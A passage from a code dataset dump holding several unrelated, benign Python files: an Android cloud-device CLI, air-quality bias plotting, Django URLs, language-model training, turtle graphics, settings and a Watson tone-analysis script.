level and turn on logging on\n all libraries. Take take precedence over |verbose|.\n \"\"\"\n if very_verbose:\n logger = logging.getLogger()\n else:\n logger = logging.getLogger(LOGGER_NAME)\n\n logging_level = logging.DEBUG if verbose or very_verbose else logging.INFO\n logger.setLevel(logging_level)\n\n if not log_file:\n handler = logging.StreamHandler()\n else:\n handler = logging.FileHandler(filename=log_file)\n log_formatter = logging.Formatter(LOGGING_FMT)\n handler.setFormatter(log_formatter)\n logger.addHandler(handler)\n\n\ndef main(argv):\n \"\"\"Main entry.\n\n Args:\n argv: A list of system arguments.\n\n Returns:\n 0 if success. None-zero if fails.\n \"\"\"\n args = _ParseArgs(argv)\n _SetupLogging(args.log_file, args.verbose, args.very_verbose)\n args = _TranslateAlias(args)\n _VerifyArgs(args)\n\n config_mgr = config.AcloudConfigManager(args.config_file)\n cfg = config_mgr.Load()\n cfg.OverrideWithArgs(args)\n\n # Check access.\n device_driver.CheckAccess(cfg)\n\n if args.which == CMD_CREATE:\n report = device_driver.CreateAndroidVirtualDevices(\n cfg,\n args.build_target,\n args.build_id,\n args.num,\n args.gce_image,\n args.local_disk_image,\n cleanup=not args.no_cleanup,\n serial_log_file=args.serial_log_file,\n logcat_file=args.logcat_file)\n elif args.which == CMD_DELETE:\n report = device_driver.DeleteAndroidVirtualDevices(cfg,\n args.instance_names)\n elif args.which == CMD_CLEANUP:\n report = device_driver.Cleanup(cfg, args.expiration_mins)\n elif args.which == CMD_SSHKEY:\n report = device_driver.AddSshRsa(cfg, args.user, args.ssh_rsa_path)\n else:\n sys.stderr.write(\"Invalid command %s\" % args.which)\n return 2\n\n report.Dump(args.report_file)\n if report.errors:\n msg = \"\\n\".join(report.errors)\n sys.stderr.write(\"Encountered the following errors:\\n%s\\n\" % msg)\n return 1\n return 0\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"tools/acloud/public/acloud_main.py","file_name":"acloud_main.py","file_ext":"py","file_size_in_byte":12301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"361123172","text":"#!/usr/bin/env python\n\n###############################################################\n# < next few lines under version control, D O N O T E D I T >\n# $Date: 2018-03-29 10:12:00 -0400 (Thu, 29 Mar 2018) $\n# $Revision: 100014 $\n# $Author: Barry.Baker@noaa.gov $\n# $Id: nemsio2nc4.py 100014 2018-03-29 14:12:00Z Barry.Baker@noaa.gov $\n###############################################################\n\n__author__ = 'Patrick.C.Campbell'\n__email__ = 'Patrick.C.Campbell@noaa.gov'\n__license__ = 'GPL'\n\nimport os\nimport subprocess\nimport sys\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\nimport cartopy.crs as ccrs\nimport dask\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport monet\nfrom monet.util.tools import calc_8hr_rolling_max,calc_24hr_ave,get_relhum\nimport dask.dataframe as dd\n\nsns.set_context('notebook')\n\nplt.ioff()\n'''\nSimple utility to make spatial plots from the NAQFC forecast and overlay observations\n'''\n\ninitial_datetime = None\n\ndef make_24hr_regulatory(df,col=None):\n \"\"\" Make 24-hour averages \"\"\"\n return calc_24hr_ave(df,col)\n\ndef make_8hr_regulatory(df,col=None):\n \"\"\" Make 8-hour rolling average daily \"\"\"\n return calc_8hr_rolling_max(df,col,window=8)\n\n\ndef chdir(fname):\n dir_path = os.path.dirname(os.path.realpath(fname))\n os.chdir(dir_path)\n return os.path.basename(fname)\n\ndef load_paired_data(fname):\n return dd.read_hdf(fname,'/*').compute()\n\n\ndef make_spatial_bias_plot(df,\n out_name,\n vmin,\n vmax,\n col1='aod_550nm',\n col2='pm25aod550',\n date=None,\n region='domain',\n **kwargs):\n if region == 'domain':\n ax = monet.plots.sp_scatter_bias(\n df, col1=col1, col2=col2, map_kwargs=dict(states=False),val_max=vmax,val_min=vmin,**kwargs)\n else:\n ax = monet.plots.sp_scatter_bias(\n df, col1=col1, col2=col2, map_kwargs=dict(states=True),val_max=vmax,val_min=vmin,**kwargs)\n\n date = pd.Timestamp(date)\n dt = date - initial_datetime\n dtstr = str(dt.days * 24 + dt.seconds // 3600).zfill(3)\n plt.title(date.strftime('time=%Y/%m/%d %H:00 | CMAQ - AIRNOW '))\n \n if region == 'domain':\n latmin=-90.0\n lonmin=-180.0\n latmax=90.0\n lonmax=180.0\n else:\n from monet.util.tools import get_giorgi_region_bounds as get_giorgi_bounds \n latmin,lonmin,latmax,lonmax,acro = get_giorgi_bounds(index=None,acronym=region)\n \n plt.xlim([lonmin,lonmax])\n plt.ylim([latmin,latmax]) \n \n plt.tight_layout(pad=0)\n savename = \"{}.{}.{}.jpg\".format(out_name,\n initial_datetime.strftime('spbias'),\n dtstr)\n print(savename)\n monet.plots.savefig(savename, bbox_inches='tight', dpi=100, decorate=True)\n plt.close()\n\n\ndef make_plots(df, variable, obs_variable, startdate, enddate, region,vmin,vmax,out_name):\n if startdate == None and enddate == None:\n for t in df.time.unique():\n date = pd.Timestamp(t)\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n print('Creating Plot:', obs_variable, 'at time:', date)\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n odf = df.loc[df.time ==\n date, ['time', 'latitude', 'longitude', obs_variable, variable]]\n if ~odf.empty:\n make_spatial_bias_plot(\n odf,\n out_name,\n vmin,\n vmax,\n col1=obs_variable,\n col2=variable,\n date=t,\n region=region,\n cmap='RdBu_r',\n edgecolor='k',\n linewidth=.8)\n else:\n sdate=pd.Timestamp(startdate)\n edate=pd.Timestamp(enddate)\n df_mean=df.groupby(['siteid'],as_index=False).mean()\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n print('Creating Plot:', obs_variable, 'for period:', startdate, 'to ', enddate )\n print(\n \">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n make_spatial_bias_plot(\n df_mean,\n out_name,\n vmin,\n vmax,\n col1=obs_variable,\n col2=variable,\n date=edate,\n region=region,\n cmap='RdBu_r',\n edgecolor='k',\n linewidth=.8)\n\ndef get_df_region(obj, region):\n from monet.util.tools import get_giorgi_region_df as get_giorgi\n if region.lower() == 'domain':\n obj['GIORGI_ACRO'] = 'domain'\n return obj\n else:\n obj = get_giorgi(region)\n return obj.loc[obj.GIORGI_ACRO == region.upper()]\n\n\nif __name__ == '__main__':\n\n parser = ArgumentParser(\n description='Make Spatial Plots for each time step or over period in files',\n formatter_class=ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '-p',\n '--paired_data',\n help='paired data input file names',\n type=str,\n nargs='+',\n required=True)\n parser.add_argument(\n '-s', '--species', nargs='+', help='Species', required=False, default=['aod_550nm'])\n parser.add_argument(\n '-b',\n '--subset_giorgi',\n help='Giorgi Region Subset true/false',\n type=bool,\n required=False,\n default=False)\n parser.add_argument(\n '-g',\n '--giorgi_region',\n help='GIORGI Region ACRONYMs NAU,SAU,AMZ,SSA,CAM,WNA,CNA,ENA,ALA,GRL,MED,NEU,WAF,EAF,SAF,SAH,SEA,EAS,SAS,CAS,TIB,NAS',\n required=False,\n default='domain')\n parser.add_argument(\n '-n',\n '--output_name',\n help='Spatial bias plot Output base name',\n type=str,\n required=False,\n default='AERONET_FV3CHEM')\n parser.add_argument(\n '-r',\n '--regulatory',\n help='boolean set to True fore 8-hrmax or 24-ave NAAQS regulatory calcs',\n type=bool,\n required=False,\n default=False)\n parser.add_argument(\n '-sd',\n '--startdate',\n help='Startdate for bias plot statistics over a period YYYY-MM-DD HH:MM:SS',\n type=str,\n required=False,\n default=None)\n parser.add_argument(\n '-ed',\n '--enddate',\n help='Enddate for bias plot statisics over a period YYYY-MM-DD HH:MM:SS',\n type=str,\n required=False,\n default=None)\n parser.add_argument(\n '-miny', '--miny_scale', help='Set static min y-scale', type=float, required=False, default=None)\n parser.add_argument(\n '-maxy', '--maxy_scale', help='Set static max y-scale', type=float, required=False, default=None)\n args = parser.parse_args()\n\n paired_data = args.paired_data\n species = args.species\n out_name = args.output_name\n subset = args.subset_giorgi\n region = args.giorgi_region\n startdate = args.startdate\n enddate = args.enddate\n reg = args.regulatory\n vmin = args.miny_scale\n vmax = args.maxy_scale\n\n\n#load the paired dataframe \n df = load_paired_data(paired_data)\n mapping_table = {'aod_550nm':'pm25aod550'}\n sub_map = {i: mapping_table[i] for i in species if i in mapping_table}\n if region is \"domain\":\n subset = False \n# subset only the correct region\n #if subset is True:\n # df.query('giorgi_region == '+'\"'+region+'\"',inplace=True)\n\n #Loop through species\n for jj in species:\n df[jj] = np.where(df[jj]<=0, np.nan, df[jj]) #Replace all values < 0 with NaN\n df_drop=df.dropna(subset=[jj,sub_map.get(jj)]) #Drops all corresponding rows with obs species = NaN\n\n#Converts OZONE, PM10, or PM2.5 dataframe to NAAQS regulatory values\n if jj == 'OZONE' and reg is True:\n df2 = make_8hr_regulatory(df_drop,[jj,sub_map.get(jj)]).rename(index=str,columns={jj+'_y':jj,sub_map.get(jj)+'_y':sub_map.get(jj)})\n elif jj == 'aod_550nm' and reg is True:\n df2 = make_24hr_regulatory(df_drop,[jj,sub_map.get(jj)]).rename(index=str,columns={jj+'_y':jj,sub_map.get(jj)+'_y':sub_map.get(jj)})\n elif jj == 'pm10_ugm3' and reg is True:\n df2 = make_24hr_regulatory(df_drop,[jj,sub_map.get(jj)]).rename(index=str,columns={jj+'_y':jj,sub_map.get(jj)+'_y':sub_map.get(jj)})\n else:\n df2=df_drop\n#Convert airnow met variable if necessary:\n if jj == 'WS':\n df2.loc[:,'WS']=df2.loc[:,'WS']*0.514 #convert obs knots-->m/s\n df2.query('WS > 0.2',inplace=True) #Filter out calm WS obs (< 0.2 m/s), should not be trusted--creates artificially larger postive model bias\n elif jj == 'BARPR':\n df2.loc[:,'PRSFC']=df2.loc[:,'PRSFC']*0.01 #convert model Pascals-->millibars\n elif jj == 'PRECIP':\n df2.loc[:,'PRECIP']=df2.loc[:,'PRECIP']*0.1 #convert obs mm-->cm\n elif jj == 'TEMP':\n df2.loc[:,'TEMP2'] = df2.loc[:,'TEMP2']-273.16 #convert model K-->C\n elif jj == 'RHUM':\n #convert model mixing ratio to relative humidity\n df2.loc[:,'Q2'] = get_relhum(df2.loc[:,'TEMP2'],df2.loc[:,'PRSFC'],df2.loc[:,'Q2'])\n #df2.rename(index=str,columns={\"Q2\": \"RH_mod\"},inplace=True)\n elif jj == 'CO':\n df2.loc[:,'CO']=df2.loc[:,'CO']*1000.0 #convert obs ppm-->ppb\n else:\n df2=df2\n#subset for period, or use output frequency\n if startdate != None and enddate != None:\n mask = (df2['time'] >= startdate) & (df2['time'] <= enddate)\n dfnew =df2.loc[mask]\n import datetime\n startdatename_obj = datetime.datetime.strptime(startdate, '%Y-%m-%d %H:%M:%S')\n enddatename_obj = datetime.datetime.strptime(enddate, '%Y-%m-%d %H:%M:%S')\n startdatename = str(datetime.datetime.strftime(startdatename_obj,'%Y-%m-%d_%H'))\n enddatename = str(datetime.datetime.strftime(enddatename_obj,'%Y-%m-%d_%H'))\n outname = \"{}.{}.{}.{}.{}\".format(out_name, region, jj, startdatename, enddatename)\n if reg is True:\n outname = \"{}.{}.{}.{}.{}.{}\".format(out_name,region, jj,startdatename, enddatename,'reg')\n if jj == 'PM2.5':\n outname = outname.replace('PM2.5','PM2P5')\n if region == 'domain':\n outname = outname.replace('domain','5X')\n else:\n dfnew = df2\n outname = \"{}.{}.{}\".format(out_name, region, jj)\n if reg is True:\n outname = \"{}.{}.{}.{}\".format(out_name,region, jj, 'reg')\n if jj == 'PM2.5':\n outname = outname.replace('PM2.5','PM2P5')\n if region == 'domain':\n outname = outname.replace('domain', '5X')\n\n dfnew_drop=dfnew.dropna(subset=[jj,sub_map.get(jj)])\n\n initial_datetime = dfnew_drop.time.min()\n # make the plots\n make_plots(dfnew_drop, sub_map.get(jj), jj, startdate, enddate, region,vmin,vmax,outname)\n","sub_path":"04.verify_spatial_bias_aeronet.py","file_name":"04.verify_spatial_bias_aeronet.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"336122645","text":"from django.conf.urls import url\nfrom designsafe.apps.data.views.base import DataDepotView\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nurlpatterns = [\n url(r'^browser/', DataDepotView.as_view(template_name='data/data_depot.html'),\n name='data_depot')\n\n]\n\ndef menu_items(**kwargs):\n if 'type' in kwargs and kwargs['type'] == 'research_workbench':\n return [\n {\n 'label': _('Published Data'),\n 'url': reverse('designsafe_data:public_data'),\n 'children': []\n },\n {\n 'label': _('My Data'),\n 'url': reverse('designsafe_data:my_data'),\n 'children': []\n }\n ]\n","sub_path":"designsafe/apps/data/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"439043351","text":"\nimport argparse\nfrom utils.data import Data\nimport random\nimport torch\nimport numpy as np\nimport sys\nimport gc\n\nseed_num = 42\nrandom.seed(seed_num)\ntorch.manual_seed(seed_num)\nnp.random.seed(seed_num)\n\ndef data_initialization(data):\n data.initial_feature_alphabets()\n data.build_alphabet(data.s_lm, ner_data=False)\n data.build_alphabet(data.t_lm, ner_data=False)\n data.build_alphabet(data.s_ner_train)\n data.build_alphabet(data.s_ner_eval)\n data.build_alphabet(data.train_dir)\n data.build_alphabet(data.dev_dir)\n data.build_alphabet(data.test_dir)\n data.fix_alphabet()\n\ndef predict_check(pred_variable, gold_variable, mask_variable, sentence_classification=False):\n \"\"\"\n input:\n pred_variable (batch_size, sent_len): pred tag result, in numpy format\n gold_variable (batch_size, sent_len): gold result variable\n mask_variable (batch_size, sent_len): mask variable\n \"\"\"\n pred = pred_variable.cpu().data.numpy()\n gold = gold_variable.cpu().data.numpy()\n mask = mask_variable.cpu().data.numpy()\n overlaped = (pred == gold)\n if sentence_classification:\n # print(overlaped)\n # print(overlaped*pred)\n right_token = np.sum(overlaped)\n total_token = overlaped.shape[0] ## =batch_size\n else:\n right_token = np.sum(overlaped * mask)\n total_token = mask.sum()\n # print(\"right: %s, total: %s\"%(right_token, total_token))\n return right_token, total_token\n\ndef batchify_with_label(input_batch_list, input_text_batch_list, gpu, if_train=True, sentence_classification=False):\n if sentence_classification:\n # return batchify_sentence_classification_with_label(input_batch_list, gpu, if_train)\n raise RuntimeError(\"not support\")\n else:\n return batchify_sequence_labeling_with_label(input_batch_list, input_text_batch_list, gpu, if_train)\n\nfrom elmo.elmo import batch_to_ids\n\ndef batchify_sequence_labeling_with_label(input_batch_list, input_text_batch_list, gpu, if_train=True):\n\n batch_size = len(input_batch_list)\n words = [sent[0] for sent in input_batch_list]\n features = [np.asarray(sent[1]) for sent in input_batch_list]\n feature_num = len(features[0][0])\n chars = [sent[2] for sent in input_batch_list]\n labels_forward = [sent[3] for sent in input_batch_list]\n labels_backward = [sent[4] for sent in input_batch_list]\n\n words_text = [sent[5] for sent in input_text_batch_list]\n elmo_char_seq_tensor = batch_to_ids(words_text)\n\n word_seq_lengths = torch.LongTensor(list(map(len, words)))\n max_seq_len = word_seq_lengths.max().item()\n word_seq_tensor = torch.zeros((batch_size, max_seq_len), requires_grad = if_train).long()\n label_forward_seq_tensor = torch.zeros((batch_size, max_seq_len), requires_grad = if_train).long()\n label_backward_seq_tensor = torch.zeros((batch_size, max_seq_len), requires_grad= if_train).long()\n feature_seq_tensors = []\n for idx in range(feature_num):\n feature_seq_tensors.append(torch.zeros((batch_size, max_seq_len),requires_grad = if_train).long())\n mask = torch.zeros((batch_size, max_seq_len), requires_grad = if_train).byte()\n for idx, (seq, label_forward, label_backward, seqlen) in enumerate(zip(words, labels_forward, labels_backward, word_seq_lengths)):\n seqlen = seqlen.item()\n word_seq_tensor[idx, :seqlen] = torch.LongTensor(seq)\n label_forward_seq_tensor[idx, :seqlen] = torch.LongTensor(label_forward)\n label_backward_seq_tensor[idx, :seqlen] = torch.LongTensor(label_backward)\n mask[idx, :seqlen] = torch.Tensor([1]*seqlen)\n for idy in range(feature_num):\n feature_seq_tensors[idy][idx,:seqlen] = torch.LongTensor(features[idx][:,idy])\n word_seq_lengths, word_perm_idx = word_seq_lengths.sort(0, descending=True)\n word_seq_tensor = word_seq_tensor[word_perm_idx]\n for idx in range(feature_num):\n feature_seq_tensors[idx] = feature_seq_tensors[idx][word_perm_idx]\n\n label_forward_seq_tensor = label_forward_seq_tensor[word_perm_idx]\n label_backward_seq_tensor = label_backward_seq_tensor[word_perm_idx]\n mask = mask[word_perm_idx]\n elmo_char_seq_tensor = elmo_char_seq_tensor[word_perm_idx]\n ### deal with char\n # pad_chars (batch_size, max_seq_len)\n pad_chars = [chars[idx] + [[0]] * (max_seq_len-len(chars[idx])) for idx in range(len(chars))]\n length_list = [list(map(len, pad_char)) for pad_char in pad_chars]\n max_word_len = max(map(max, length_list))\n char_seq_tensor = torch.zeros((batch_size, max_seq_len, max_word_len), requires_grad = if_train).long()\n char_seq_lengths = torch.LongTensor(length_list)\n for idx, (seq, seqlen) in enumerate(zip(pad_chars, char_seq_lengths)):\n for idy, (word, wordlen) in enumerate(zip(seq, seqlen)):\n # print len(word), wordlen\n char_seq_tensor[idx, idy, :wordlen] = torch.LongTensor(word)\n\n char_seq_tensor = char_seq_tensor[word_perm_idx].view(batch_size*max_seq_len,-1)\n char_seq_lengths = char_seq_lengths[word_perm_idx].view(batch_size*max_seq_len,)\n char_seq_lengths, char_perm_idx = char_seq_lengths.sort(0, descending=True)\n char_seq_tensor = char_seq_tensor[char_perm_idx]\n _, char_seq_recover = char_perm_idx.sort(0, descending=False)\n _, word_seq_recover = word_perm_idx.sort(0, descending=False)\n if gpu >= 0 and torch.cuda.is_available():\n word_seq_tensor = word_seq_tensor.cuda(gpu)\n for idx in range(feature_num):\n feature_seq_tensors[idx] = feature_seq_tensors[idx].cuda(gpu)\n word_seq_lengths = word_seq_lengths.cuda(gpu)\n word_seq_recover = word_seq_recover.cuda(gpu)\n label_forward_seq_tensor = label_forward_seq_tensor.cuda(gpu)\n label_backward_seq_tensor = label_backward_seq_tensor.cuda(gpu)\n char_seq_tensor = char_seq_tensor.cuda(gpu)\n char_seq_recover = char_seq_recover.cuda(gpu)\n mask = mask.cuda(gpu)\n elmo_char_seq_tensor = elmo_char_seq_tensor.cuda(gpu)\n return word_seq_tensor,feature_seq_tensors, word_seq_lengths, word_seq_recover, char_seq_tensor, char_seq_lengths, char_seq_recover, label_forward_seq_tensor, label_backward_seq_tensor, mask, elmo_char_seq_tensor\n\nfrom model.lm1 import LanguageModel1\nimport torch.optim as optim\nimport time\n\ndef lr_decay(optimizer, epoch, decay_rate, init_lr):\n lr = init_lr/(1+decay_rate*epoch)\n print(\" Learning rate is set as:\", lr)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return optimizer\n\n\ndef train(data):\n print(\"Training model...\")\n data.show_data_summary()\n save_data_name = data.lm_model_dir +\".dset\"\n data.save(save_data_name)\n\n model = LanguageModel1(data)\n\n if data.optimizer.lower() == \"sgd\":\n optimizer = optim.SGD(model.parameters(), lr=data.HP_lr, momentum=data.HP_momentum,weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"adagrad\":\n optimizer = optim.Adagrad(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"adadelta\":\n optimizer = optim.Adadelta(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"rmsprop\":\n optimizer = optim.RMSprop(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n elif data.optimizer.lower() == \"adam\":\n optimizer = optim.Adam(model.parameters(), lr=data.HP_lr, weight_decay=data.HP_l2)\n else:\n print(\"Optimizer illegal: %s\"%(data.optimizer))\n exit(1)\n\n def freeze_net(model):\n for p in model.word_hidden.wordrep.word_embedding.parameters():\n p.requires_grad = False\n if data.tune_wordemb == False:\n freeze_net(model)\n\n train_on_domain(model, data.HP_iteration, data.optimizer, optimizer, data.HP_lr_decay, data.HP_lr, data.HP_batch_size,\n data.sentence_classification, data.HP_gpu, data.lm_model_dir, data.patience, data.lm_obj_acc,\n data.train_texts, data.train_Ids, target=False)\n\n train_on_domain(model, data.HP_iteration, data.optimizer, optimizer, data.HP_lr_decay, data.HP_lr, data.HP_batch_size,\n data.sentence_classification, data.HP_gpu, data.lm_model_dir, data.patience, data.lm_obj_acc,\n data.dev_texts, data.dev_Ids, target=True)\n\n\ndef train_on_domain(model, iteration, optim_name, optimizer, lr_decay, lr, batch_size, sent_class, gpu, lm_model_dir, patience,\n lm_obj_acc, texts, ids, target=True):\n best_dev = -10\n bad_counter = 0\n ## start training\n for idx in range(iteration):\n epoch_start = time.time()\n temp_start = epoch_start\n print(\"Epoch: %s/%s\" %(idx,iteration))\n if optim_name == \"SGD\":\n optimizer = lr_decay(optimizer, idx, lr_decay, lr)\n instance_count = 0\n sample_id = 0\n sample_loss = 0\n total_loss = 0\n right_token = 0\n whole_token = 0\n cc = list(zip(ids, texts))\n random.shuffle(cc)\n ids[:], texts[:] = zip(*cc)\n print(\"Shuffle: first input word list:\", ids[0][0])\n ## set model in train model\n model.train()\n model.zero_grad()\n train_num = len(ids)\n total_batch = train_num//batch_size+1\n for batch_id in range(total_batch):\n start = batch_id*batch_size\n end = (batch_id+1)*batch_size\n if end >train_num:\n end = train_num\n instance = ids[start:end]\n instance_text = texts[start:end]\n if not instance:\n continue\n batch_word, batch_features, batch_wordlen, batch_wordrecover, batch_char, batch_charlen, batch_charrecover, batch_label_forward, \\\n batch_label_backward, mask, batch_elmo_char = batchify_with_label(instance, instance_text,\n gpu, True, sent_class)\n instance_count += 1\n loss, tag_seq_forward, tag_seq_backward = model.calculate_loss(batch_word, batch_features, batch_wordlen, batch_char, batch_charlen, batch_charrecover, batch_label_forward, batch_label_backward, mask, batch_elmo_char, target)\n right_forward, whole_forward = predict_check(tag_seq_forward, batch_label_forward, mask, sent_class)\n right_backward, whole_backward = predict_check(tag_seq_backward, batch_label_backward, mask, sent_class)\n\n right_token += (right_forward + right_backward)\n whole_token += (whole_forward + whole_backward)\n # print(\"loss:\",loss.item())\n sample_loss += loss.item()\n total_loss += loss.item()\n if end%500 == 0:\n temp_time = time.time()\n temp_cost = temp_time - temp_start\n temp_start = temp_time\n print(\" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f\"%(end, temp_cost, sample_loss, right_token, whole_token,(right_token+0.)/whole_token))\n if sample_loss > 1e8 or str(sample_loss) == \"nan\":\n print(\"ERROR: LOSS EXPLOSION (>1e8) ! PLEASE SET PROPER PARAMETERS AND STRUCTURE! EXIT....\")\n exit(1)\n sys.stdout.flush()\n sample_loss = 0\n loss.backward()\n optimizer.step()\n model.zero_grad()\n temp_time = time.time()\n temp_cost = temp_time - temp_start\n print(\" Instance: %s; Time: %.2fs; loss: %.4f; acc: %s/%s=%.4f\"%(end, temp_cost, sample_loss, right_token, whole_token,(right_token+0.)/whole_token))\n\n epoch_finish = time.time()\n epoch_cost = epoch_finish - epoch_start\n print(\"Epoch: %s training finished. Time: %.2fs, speed: %.2fst/s, total loss: %s, acc: %s/%s=%.4f\"%(idx, epoch_cost, train_num/epoch_cost, total_loss, right_token, whole_token,(right_token+0.)/whole_token))\n\n if total_loss > 1e8 or str(total_loss) == \"nan\":\n print(\"ERROR: LOSS EXPLOSION (>1e8) ! PLEASE SET PROPER PARAMETERS AND STRUCTURE! EXIT....\")\n exit(1)\n # continue\n\n current_score = (right_token+0.)/whole_token\n\n if current_score > best_dev:\n\n print(\"Exceed previous best acc:\", best_dev)\n # model_name = data.model_dir +'.'+ str(idx) + \".model\"\n model_name = lm_model_dir + \".lm.model\"\n # print(\"Save current best model in file:\", model_name)\n torch.save(model.state_dict(), model_name)\n best_dev = current_score\n\n bad_counter = 0\n else:\n bad_counter += 1\n\n gc.collect()\n\n if bad_counter >= patience:\n print('Early Stop!')\n break\n\n if current_score > lm_obj_acc:\n print('current accuracy {} > objective accuracy {}, exit ...'.format(current_score, lm_obj_acc))\n break\n\n\nif __name__ == '__main__':\n print('train a bilstm language model')\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--config', help='Configuration File', default='None')\n\n args = parser.parse_args()\n data = Data()\n\n if args.config == 'None':\n raise RuntimeError(\"must provide a config file\")\n else:\n data.read_config(args.config)\n\n status = data.status.lower()\n print(\"Seed num:\",seed_num)\n\n if status == 'train':\n data_initialization(data)\n data.generate_instance('train')\n data.generate_instance('dev')\n data.build_pretrain_emb()\n train(data)\n elif status == 'decode':\n print(\"Invalid argument!\")\n else:\n print(\"Invalid argument!\")","sub_path":"main_lm1.py","file_name":"main_lm1.py","file_ext":"py","file_size_in_byte":13679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"351208315","text":"import turtle\n\ndef draw_colour_square(some_turtle):\n list_colour = [\"Blue\", \"Purple\", \"White\", \"Green\", \"Yellow\"]\n for i in list_colour:\n some_turtle.color(i)\n some_turtle.forward(100)\n some_turtle.right(90)\n\ndef draw_colour_square_art():\n window = turtle.Screen()\n window.bgcolor('Blue')\n # Here I'll create an instance called supersquare\n supersquare = turtle.Turtle()\n supersquare.shape('turtle')\n supersquare.color('white')\n supersquare.speed(2)\n for i in range(1,37):\n draw_colour_square(supersquare)\n supersquare.right(10)\n window.exitonclick()\n\ndef draw_square(some_turtle):\n for i in range(1,5):\n some_turtle.forward(100)\n #on bellow method \"90\" means 90 degrees to right\n some_turtle.right(90)\n\ndef draw_art():\n window = turtle.Screen()\n window.bgcolor('Blue')\n # Here I'll create an instance called supersquare\n supersquare = turtle.Turtle()\n supersquare.shape('turtle')\n supersquare.color('white')\n supersquare.speed(2)\n for i in range(1,37):\n draw_square(supersquare)\n supersquare.right(10)\n window.exitonclick()\n\n#draw_art()\ndraw_colour_square_art()\n\n","sub_path":"PFWPython/mindstorms.py","file_name":"mindstorms.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"235482936","text":"# coding: utf-8\n\"\"\"\nDELETE THIS FILE IN PRODUCTION!!!!\n\"\"\"\n\n# from quokka.utils.settings import get_password\n\n# MONGODB_SETTINGS = {'DB': \"quokka\",\n# 'USERNAME': 'quokka',\n# 'PASSWORD': get_password('db'),\n# 'HOST': 'ds035498.mongolab.com',\n# 'PORT': 35498} # use for mongolab\n\nMONGODB_SETTINGS = {'DB': 'local_test3'}\nDEBUG = True\nDEBUG_TOOLBAR_ENABLED = False\n","sub_path":"quokka/example.local_settings.py","file_name":"example.local_settings.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"271190532","text":"import json\nfrom watson_developer_cloud import ToneAnalyzerV3\nfrom TranslateText import translate_text\nfrom watson_developer_cloud import WatsonApiException\n# APIキーをconfig.pyに書いて参照\nimport config\n\ndef analyze_emotion_from_text(text):\n \"\"\"\n テキスト(日本語不可)から感情を分析する\n Watson - ToneAnalyzer\n \"\"\"\n API_KEY = config.API_KEY_TONEANALYZER\n URL = \"https://gateway-tok.watsonplatform.net/tone-analyzer/api\"\n try:\n # Invoke a Tone Analyzer method\n tone_analyzer = ToneAnalyzerV3(\n version='2017-09-21',\n iam_apikey=API_KEY,\n url=URL\n )\n\n tone_analysis = tone_analyzer.tone(\n {'text': text},\n 'application/json'\n ).get_result()\n \n return json.dumps(tone_analysis, indent=4, ensure_ascii=False)\n\n except WatsonApiException as ex:\n print(\"Method failed with status code \" + str(ex.code) + \": \" + ex.message)\n\nif __name__ == \"__main__\":\n # textに、Speech-to-Textの結果が渡される\n # サンプルのテキスト\n text = 'Team, I know that times are tough! Product '\\\n 'sales have been disappointing for the past three '\\\n 'quarters. We have a competitive product, but we '\\\n 'need to do a better job of selling it!'\n \n # Google翻訳で、日本語を英語に翻訳する\n print(\"Translate Japanese -> English\")\n orig_text = \"これめっちゃ面白いな。これ何円で買える?\"\n print(\"inputted text = {}\".format(orig_text))\n translate_response = translate_text(orig_text)\n\n # JSON文字列をプログラムで使用可能な形式に変換(デコード)\n # 参考サイト:http://programming-study.com/technology/python-json-dumps/\n decoded_json = json.loads(translate_response)\n # JSONから翻訳結果の文のみを抽出\n translate_result = decoded_json[\"translations\"][0][\"translation\"]\n print(\"translate_result = {}\".format(translate_result))\n print()\n\n ### 英訳したテキストを感情分析する\n print(\"Tone Analyze translated text\")\n print(\"inputted text = {}\".format(translate_result))\n analyze_response = analyze_emotion_from_text(translate_result)\n \n # JSONをデコード\n decoded_json = json.loads(analyze_response)\n # 分析結果を抽出\n analyze_result = decoded_json[\"document_tone\"]\n print(\"analyze_result = {}\".format(analyze_result))","sub_path":"ToneAnalyzer.py","file_name":"ToneAnalyzer.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"128785547","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017年11月22日\n@author: Administrator\n'''\nfrom numpy import array,dot,random,exp\ndef sigmord(x):\n return 1/(1+exp(-x))\ndef error_output(o,t):\n return 